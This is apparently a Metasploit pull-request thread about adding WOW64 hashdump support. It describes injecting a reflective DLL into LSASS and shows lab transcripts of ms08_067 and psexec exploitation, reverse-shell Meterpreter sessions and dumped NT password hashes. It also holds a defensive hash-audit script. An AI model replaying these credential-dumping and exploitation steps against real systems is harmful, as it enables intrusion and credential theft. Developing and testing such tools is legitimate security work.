
WOW64 Support for hashdump #631

Merged (4 commits) on Apr 27, 2023

Conversation

@zeroSteiner (Contributor) commented Apr 6, 2023

Overview

This closes rapid7/metasploit-framework#17776 by adding hashdump support to 32-bit Meterpreters running on 64-bit hosts.

Old Approach

The old approach was to use native code compiled into Meterpreter that it would carve out and then copy into an executable segment in the target LSASS process. This was the main source of the limitation because the architecture of LSASS has to match Meterpreter. This meant dump_sam was one giant function that couldn't use any external functions so they all had to be passed in through the FUNCTIONARGS struct and be resolved by the injector (meterpreter).

New Approach

The new approach breaks dump_sam into its own Visual Studio solution file. This allows DLLs for both 32-bit and 64-bit variants to be built. Next the 32-bit Meterpreter embeds both 32-bit and 64-bit variants within its priv extension so it can inject the correct one at run time. The 64-bit Meterpreter will only ever run on systems with a 64-bit version of LSASS so it only embeds the 64-bit version of the DLL. The DLLs are embedded as resources so they don't need to be sent as an argument which retains backwards compatibility because there are no changes necessary in the Metasploit Framework. I tried to make these DLLs as small as possible. In the main MSVC release builds (the ones we ship to users) the export is by ordinal using the new pattern, they are dynamically linked to reduce the size, and the MSVCRT isn't included.

ReflectiveFreeAndExitThread

Reflective DLLs can not take advantage of FreeLibraryAndExitThread like traditionally loaded DLLs can. This new method allows an RDLL to free its memory and exit cleanly. It's self contained in its own files for future reuse, and perhaps it should be moved into the ReflectiveDLLInjection repo. The problem it solves is that the memory in which the RDLL is running was VirtualAlloc'ed by the loader and can't be simply VirtualFree'ed without running into a race condition of the executable code effectively freeing itself. This approach can be broken down into the following steps:

  1. A new, suspended thread is created to invoke APCs (referred to as the cleanup thread). This thread uses ExitThread as its starting point to ensure it exits cleanly once it has executed all of the APCs that have been queued to it.
  2. A handle to the current/RDLL thread is opened to be passed to the cleanup thread.
  3. NtQueueApcThread is used to add a call to WaitForSingleObjectEx. NtQueueApcThread is used instead of QueueUserAPC because it allows the target function to be called with three arguments instead of one. The WaitForSingleObjectEx call is used to ensure the cleanup thread waits on the current thread before executing the next APC. The current thread can take its time before exiting.
  4. QueueUserAPC is used to have the cleanup thread close the handle to the current thread, ensuring there is no handle leak.
  5. NtQueueApcThread is used again to queue a call to VirtualFree to free the memory previously allocated by the ReflectiveLoader. This step is the whole point of the process.
  6. The cleanup thread is resumed, causing it to execute its APCs before invoking its start routine.
  7. The current thread closes the handle to the cleanup thread and exits itself, causing the WaitForSingleObjectEx call in step 3 to return and the remaining queued function to run in order.

You can validate that everything works correctly by seeing that the process does not crash and that the memory is freed and handles are closed. Process Hacker is a good tool for this and you can log the freed values in the debug output. This has been validated on Windows XP and Server 2019.

Additional changes

  • Updated inject_dll signature. It had a few unnecessary limitations including:
    • The argument was a null-terminated string instead of an arbitrarily sized buffer (fixed by adding a size argument)
    • The argument that was provided had to be a local buffer and not a remote pointer (fixed by checking the new size argument)
    • The target process architecture must match the current Meterpreter architecture (fixed by adding a destination architecture argument like the other inject methods have)
  • Event lock names are now randomized
  • Switched get_lsass_handle from using GetModuleBaseName to use GetProcessImageFileName so it would work in WOW64 environments

Testing

  • Test all of the MSVC builds to ensure they're compiling correctly
  • Test all of the docker builds to ensure they are also compiling correctly (run make docker from c/meterpreter)
  • Test that hashdump works on
    • 32-bit systems with a 32-bit Meterpreter
    • 64-bit systems with a 64-bit Meterpreter
    • 64-bit systems with a 32-bit Meterpreter

If you test the MinGW builds, note that the session will crash on initialization unless AutoLoadStdapi is disabled or the changes from #630 are present.

Demo

Shows everything working as expected in the following scenarios:

  • x86 working on Windows XP (showing we still support the oldest version)
  • WOW64 working on Server 2019 (this is the new one)
  • x64 working on Server 2019 (showing this still works)

msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.16:445 - Automatically detecting the target...
[*] 192.168.159.16:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.159.16:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.159.16:445 - Attempting to trigger the vulnerability...
[*] Sending stage (242254 bytes) to 192.168.159.16
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.16:1036) at 2023-04-06 17:40:53 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : SMCINTYR-7D7507
OS              : Windows XP (5.1 Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cde0d26ae931b73b59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:d998557dad6cc5ee0611a3ea94445b99:1008c1045548a33f06d2848c53e73d3e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:73fc8537a3d4ac0b57ec75736d809988:::
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.16 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/psexec 
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.96:445 - Connecting to the server...
[*] 192.168.159.96:445 - Authenticating to 192.168.159.96:445 as user 'smcintyre'...
[*] 192.168.159.96:445 - Selecting PowerShell target
[*] 192.168.159.96:445 - Executing the payload...
[+] 192.168.159.96:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (186950 bytes) to 192.168.159.96
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x86.dll is being used
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.96:56672) at 2023-04-06 17:40:10 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-KHPRSGSRF30
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae932b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
smcintyre:1000:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1681c4fd1448319a8c04f:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:492392ba299df55a3d78fb3004a81b96:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4085fbdccb5f3c0b34f112bb7a57fe3d:::
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.96 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.96:445 - Connecting to the server...
[*] 192.168.159.96:445 - Authenticating to 192.168.159.96:445 as user 'smcintyre'...
[*] 192.168.159.96:445 - Selecting PowerShell target
[*] 192.168.159.96:445 - Executing the payload...
[+] 192.168.159.96:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x64.dll is being used
[*] Sending stage (222278 bytes) to 192.168.159.96
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x64.dll is being used
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.96:56676) at 2023-04-06 17:40:31 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-KHPRSGSRF30
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae932b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
smcintyre:1000:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1681c4fd1448319a8c04f:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:492392ba299df55a3d78fb3004a81b96:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4085fbdccb5f3c0b34f112bb7a57fe3d:::
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.96 - Meterpreter session 3 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > 
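
The pwdump-style lines that hashdump prints above (user:RID:LM hash:NT hash:::) are what a defender ends up auditing after a test like this. As an added example that is not part of the metasploit-payloads project, the Python below parses such a console transcript and flags blank passwords, legacy LM hash storage and NT hashes shared between accounts; every account name and every non-empty hash value in the sample is constructed.

```python
"""Audit pwdump-style hashdump lines (user:rid:lm:nt:::) for weak password hygiene.

Added example, not part of the metasploit-payloads project. SAMPLE_OUTPUT is
constructed to resemble the hashdump transcripts in this pull request.
"""
import re
from collections import defaultdict

# Hashes of the empty password. The LM value is also what hashdump prints when
# no LM hash is stored at all; the NT value means the account really has a blank
# password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One pwdump record: username, RID, 32-hex LM hash, 32-hex NT hash, ":::".
RECORD_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample (hypothetical accounts, placeholder hashes), including the
# prompt lines and a redacted record that a real console transcript may contain.
SAMPLE_OUTPUT = """\
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy_user:1000:fedcba9876543210fedcba9876543210:abcdefabcdefabcdefabcdefabcdefab:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Alice Example:1002:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
svc_backup:1003:aad3b435b51404eeaad3b435b51404ee:...:::
meterpreter >
"""


def parse_hashdump(text):
    """Return a list of {"user", "rid", "lm", "nt"} dicts for every well-formed record.

    Prompts, status lines and redacted records ("...") are skipped rather than
    rejected, because real transcripts mix them in with the data.
    """
    entries = []
    for raw in text.splitlines():
        m = RECORD_RE.match(raw.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["rid"] = int(rec["rid"])
        rec["lm"] = rec["lm"].lower()
        rec["nt"] = rec["nt"].lower()
        entries.append(rec)
    return entries


def audit(entries):
    """Flag blank passwords, legacy LM storage and NT hashes shared by several accounts."""
    findings = {"blank_password": [], "lm_hash_stored": [], "shared_nt_hash": {}}
    by_nt = defaultdict(list)
    for rec in entries:
        if rec["nt"] == EMPTY_NT:
            findings["blank_password"].append(rec["user"])
        else:
            by_nt[rec["nt"]].append(rec["user"])
        if rec["lm"] != EMPTY_LM:
            # A stored LM hash means the host still keeps the weak, case-folded
            # LM representation (typically NoLMHash is off or the password is old).
            findings["lm_hash_stored"].append(rec["user"])
    # NT hashing is unsalted, so identical NT hashes mean identical passwords.
    findings["shared_nt_hash"] = {
        nt: users for nt, users in by_nt.items() if len(users) > 1
    }
    return findings


def audit_text(text):
    """Parse a console transcript and audit it in one call."""
    return audit(parse_hashdump(text))


if __name__ == "__main__":
    for category, hits in audit_text(SAMPLE_OUTPUT).items():
        print(f"{category}: {hits}")
```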

@jmartin-tech (Contributor)

Automation compile errors:

16:50:15   C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.Cpp.Platform.targets(64,5): error MSB8020: The build tools for v141_xp (Platform Toolset = 'v141_xp') cannot be found. To build using the v141_xp build tools, please install v141_xp build tools.  Alternatively, you may upgrade to the current Visual Studio tools by selecting the Project menu or right-click the solution, and then selecting "Upgrade Solution...". [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\dump_sam\dump_sam.vcxproj] [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\ext_server_priv\ext_server_priv.vcxproj]
16:50:15   C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.Cpp.Platform.targets(64,5): error MSB8020: The build tools for v141_xp (Platform Toolset = 'v141_xp') cannot be found. To build using the v141_xp build tools, please install v141_xp build tools.  Alternatively, you may upgrade to the current Visual Studio tools by selecting the Project menu or right-click the solution, and then selecting "Upgrade Solution...". [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\dump_sam\dump_sam.vcxproj] [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\ext_server_priv\ext_server_priv.vcxproj]
16:50:15   C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.Cpp.Platform.targets(64,5): error MSB8020: The build tools for v141_xp (Platform Toolset = 'v141_xp') cannot be found. To build using the v141_xp build tools, please install v141_xp build tools.  Alternatively, you may upgrade to the current Visual Studio tools by selecting the Project menu or right-click the solution, and then selecting "Upgrade Solution...". [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\dump_sam\dump_sam.vcxproj] [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\ext_server_priv\ext_server_priv.vcxproj]
16:50:15   C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.Cpp.Platform.targets(64,5): error MSB8020: The build tools for v141_xp (Platform Toolset = 'v141_xp') cannot be found. To build using the v141_xp build tools, please install v141_xp build tools.  Alternatively, you may upgrade to the current Visual Studio tools by selecting the Project menu or right-click the solution, and then selecting "Upgrade Solution...". [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\dump_sam\dump_sam.vcxproj] [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\ext_server_priv\ext_server_priv.vcxproj]
16:50:15   C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppCommon.targets(122,5): error MSB3073: The command "msbuild -t:Build -p:Configuration=Release;Platform=Win32 ..\dump_sam\dump_sam.sln [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\ext_server_priv\ext_server_priv.vcxproj]
16:50:15 C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppCommon.targets(122,5): error MSB3073: msbuild -t:Build -p:Configuration=Release;Platform=x64 ..\dump_sam\dump_sam.sln [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\ext_server_priv\ext_server_priv.vcxproj]
16:50:15 C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppCommon.targets(122,5): error MSB3073: :VCEnd" exited with code 1. [C:\Users\vagrant\metasploit-payloads\c\meterpreter\workspace\ext_server_priv\ext_server_priv.vcxproj]
16:50:15 
16:50:15     15 Warning(s)
16:50:15     5 Error(s)

@zeroSteiner (Contributor, Author)

@jmartin-r7 I'm confused. It looks like it's complaining that the v141_xp platform toolset can't be found, but that's what the Meterpreter extensions are configured to use, which is why I selected that value. Is there some special way to access that on the build system?

Here's the config for the priv extension I based it on showing it's using v141_xp as the Platform toolset. It's the same value for the r7_release, Release and Debug configurations.

[screenshot: priv extension project configuration showing Platform Toolset = v141_xp]

@jmartin-tech (Contributor) commented Apr 7, 2023

Automation uses v120_xp on VisualStudio Express 2013 Community. As noted in the README for the c/meterpreter build, you can force newer VisualStudio versions back to that toolset with an option on compile.

@adfoster-r7 (Contributor) commented Apr 21, 2023

Testing output - windows 7 failing and windows 10 passing

Windows 7 - 32 bit 🔴

Looks like this breaks opening up a normal session against a Windows 7 host with default psexec 32 bit payload - windows/meterpreter/reverse_tcp

Before:

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.135 username=alan password=a
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.135:445 - Connecting to the server...
[*] 192.168.123.135:445 - Authenticating to 192.168.123.135:445 as user 'alan'...
[*] 192.168.123.135:445 - Selecting PowerShell target
[*] 192.168.123.135:445 - Executing the payload...
[+] 192.168.123.135:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.123.135
[*] Meterpreter session 8 opened (192.168.123.1:4444 -> 192.168.123.135:49170) at 2023-04-21 11:39:15 +0100

meterpreter > 

After building Meterpreter and copying the custom dll across:

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.135 username=alan password=a
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.135:445 - Connecting to the server...
[*] 192.168.123.135:445 - Authenticating to 192.168.123.135:445 as user 'alan'...
[*] 192.168.123.135:445 - Selecting PowerShell target
[*] 192.168.123.135:445 - Executing the payload...
[+] 192.168.123.135:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (541267 bytes) to 192.168.123.135
[*] 192.168.123.135 - Meterpreter session 7 closed.  Reason: Died

From the TLV logging it dies after the stdapi dll load:

SEND: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=10 command=core_enumextcmd>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="06900196490826778254789703096614">
  #<Rex::Post::Meterpreter::Tlv type=UINT            meta=INT        value=2000>
  #<Rex::Post::Meterpreter::Tlv type=LENGTH          meta=INT        value=1000>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Response        tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=10 command=core_enumextcmd>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="06900196490826778254789703096614">
  #<Rex::Post::Meterpreter::Tlv type=RESULT          meta=INT        value=0>
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="}r\x18s\x7Fm\xDF&8\x889\x89\\\xCAP\xAF">
]>

SEND: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=12 command=core_loadlib>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="11047606585979534701349857621491">
  #<Rex::Post::Meterpreter::Tlv type=DATA            meta=RAW        value="MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xF ...">
  #<Rex::Post::Meterpreter::Tlv type=LIBRARY_PATH    meta=STRING     value="ext268864.x86.dll">
  #<Rex::Post::Meterpreter::Tlv type=FLAGS           meta=INT        value=2>
  #<Rex::Post::Meterpreter::Tlv type=TARGET_PATH     meta=STRING     value="/tmp/ext268864.x86.dll">
]>
[*] 192.168.123.135 - Meterpreter session 10 closed.  Reason: Died

Windows 7 64 bit 🟢

The windows/x64/meterpreter/reverse_tcp payload works:


msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.135 username=alan password=a
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.135:445 - Connecting to the server...
[*] 192.168.123.135:445 - Authenticating to 192.168.123.135:445 as user 'alan'...
[*] 192.168.123.135:445 - Selecting PowerShell target
[*] 192.168.123.135:445 - Executing the payload...
[+] 192.168.123.135:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (223814 bytes) to 192.168.123.135
[*] Meterpreter session 13 opened (192.168.123.1:4444 -> 192.168.123.135:49175) at 2023-04-21 11:43:57 +0100

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:....:::
alan:1000:aad3b435b51404eeaad3b435b51404ee:...:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:...:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:...:::
meterpreter >

Windows 10 32 🔴

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.164 username=admin password=password123
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.164:445 - Connecting to the server...
[*] 192.168.123.164:445 - Authenticating to 192.168.123.164:445 as user 'admin'...
[*] 192.168.123.164:445 - Selecting PowerShell target
[*] 192.168.123.164:445 - Executing the payload...
[+] 192.168.123.164:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (541267 bytes) to 192.168.123.164
[*] 192.168.123.164 - Meterpreter session 14 closed.  Reason: Died

Windows 10 64 🟢

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.164 username=admin password=password123
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.164:445 - Connecting to the server...
[*] 192.168.123.164:445 - Authenticating to 192.168.123.164:445 as user 'admin'...
[*] 192.168.123.164:445 - Selecting PowerShell target
[*] 192.168.123.164:445 - Executing the payload...
[+] 192.168.123.164:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (223814 bytes) to 192.168.123.164
[*] Meterpreter session 15 opened (192.168.123.1:4444 -> 192.168.123.164:63076) at 2023-04-21 11:45:54 +0100

meterpreter > hashdump
admin:1005:aad3b435b51404eeaad3b435b51404ee....etc...etc..
meterpreter > 

Edit: Verified the above as PEBKAC, ignore

@zeroSteiner (Contributor, Author)

@adfoster-r7 did you build with MinGW or MSVC?

@adfoster-r7 (Contributor) commented Apr 21, 2023

MSVC - I'm just looking into this a bit more now as potentially it's pebkac. I did rebase this branch locally against the latest master before testing which might have caused the problem for me as well

@adfoster-r7 (Contributor)

I've verified generating a stageless 32 bit payload works now:

msf6 payload(windows/meterpreter_reverse_tcp) > to_handler
WARNING: Local file /Users/user/Documents/code/metasploit-framework/data/meterpreter/metsrv.x86.debug.dll is being used
[*] Payload Handler Started as Job 5
msf6 payload(windows/meterpreter_reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.123.1:4444 
WARNING: Local file /Users/user/Documents/code/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.debug.dll is being used
WARNING: Local file /Users/user/Documents/code/metasploit-framework/data/meterpreter/ext_server_priv.x86.debug.dll is being used
[*] Meterpreter session 22 opened (192.168.123.1:4444 -> 192.168.123.135:49395) at 2023-04-21 13:51:36 +0100

msf6 payload(windows/meterpreter_reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                     Information                             Connection
  --  ----  ----                     -----------                             ----------
  22        meterpreter x86/windows  WIN-4PK8J9RF052\alan @ WIN-4PK8J9RF052  192.168.123.1:4444 -> 192.168.123.135:49395 (192.168.123.135)

msf6 payload(windows/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 22...

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alan:1000:aad3b435b51404eeaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:d9b73b76001fb6431956ca5aa9714672:::
meterpreter > exit

But psexec still fails; so I believe it's an issue with staged payloads, and isn't pebkac 🤞

@zeroSteiner (Contributor, Author) commented Apr 21, 2023

I can't reproduce the problem. It looks like you're looking at a 32-bit Meterpreter (built with MSVC) running on a 64-bit Windows 10 host right? Did you also build and load new versions of metsrv, stdapi and priv? It's possible that if one of those was not built using the new code, it'd cause a failure on load maybe. The only metsrv and stdapi changes made though were the injection API updates.

Testing Output

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.87:445 - Connecting to the server...
[*] 192.168.159.87:445 - Authenticating to 192.168.159.87:445 as user 'smcintyre'...
[*] 192.168.159.87:445 - Selecting PowerShell target
[*] 192.168.159.87:445 - Executing the payload...
[+] 192.168.159.87:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x86.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (186950 bytes) to 192.168.159.87
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x86.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x86.dll is being used
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.87:49989) at 2023-04-21 09:00:52 -0400

meterpreter > sysinfo
Computer        : DESKTOP-81CEH16
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
aliddle:1001:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
smcintyre:1000:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ff05a994a516bd07dc60a6b113636940:::
meterpreter > 

I rebased to pull in the change for fixing stdapi built with MinGW and the build is failing again.

@jmartin-tech (Contributor)

@msjenkins-r7 test this please.

Commits added to this pull request:

This is going to build a stand-alone RDLL that can be injected into
LSASS for hashdump.

The samsrv.dll functions still need to be resolved because they're not
exported but the rest can be used normally thanks to the RDLL loader.
Defined 32-bit and 64-bit structures that are compatible with MSVC and
MinGW. DLLs are dynamically linked for size and the Visual-C Runtime is
not used.

The reflectively loaded DLL is freed once the operation has completed.

Need to be able to pass things that are not strings

Switch to using the dump_sam RDLL for x86, WOW64 and x64 hashdump
support.

@smcintyre-r7 (Contributor)

@msjenkins-r7 test this please.

@adfoster-r7 (Contributor) commented Apr 27, 2023

The previous Windows 7 / 10 configuration passed; and mingw output below. Separate issue raised to fix docker mingw builds from a mac host created - #641

Mingw Windows 7 32 🟢

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.142 username=alan password=a
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.142:445 - Connecting to the server...
[*] 192.168.123.142:445 - Authenticating to 192.168.123.142:445 as user 'alan'...
[*] 192.168.123.142:445 - Selecting PowerShell target
[*] 192.168.123.142:445 - Executing the payload...
[+] 192.168.123.142:445 - Service start timed out, OK if running a command or non-service executable...
hash[*] Sending stage (488696 bytes) to 192.168.123.142
dump[*] Meterpreter session 2 opened (192.168.123.1:4444 -> 192.168.123.142:49161) at 2023-04-27 16:38:58 +0100

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alan:1000:aad3b435b51404eeaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:d9b73b76001fb6431956ca5aa9714672:::

Mingw Windows 7 64 🟢

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.145 username=alan password=a payload=windows/x64/meterpreter/reverse_tcp
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.145:445 - Connecting to the server...
[*] 192.168.123.145:445 - Authenticating to 192.168.123.145:445 as user 'alan'...
[*] 192.168.123.145:445 - Selecting PowerShell target
[*] 192.168.123.145:445 - Executing the payload...
[+] 192.168.123.145:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /Users/adfoster/Documents/code/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (554937 bytes) to 192.168.123.145
WARNING: Local file /Users/adfoster/Documents/code/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /Users/adfoster/Documents/code/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.145:49178) at 2023-04-27 17:28:35 +0100

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alan:1000:aad3b435b51404eeaad3b435b51404ee:186cb09181e2c2ecaac768c47c729904:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:d9b73b76001fb6431956ca5aa9714672:::

Mingw Windows 10 32 🟢

msf6 exploit(windows/smb/psexec) > rerun rhost=192.168.123.141 username=admin password=password123
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.141:445 - Connecting to the server...
[*] 192.168.123.141:445 - Authenticating to 192.168.123.141:445 as user 'admin'...
[*] 192.168.123.141:445 - Selecting PowerShell target
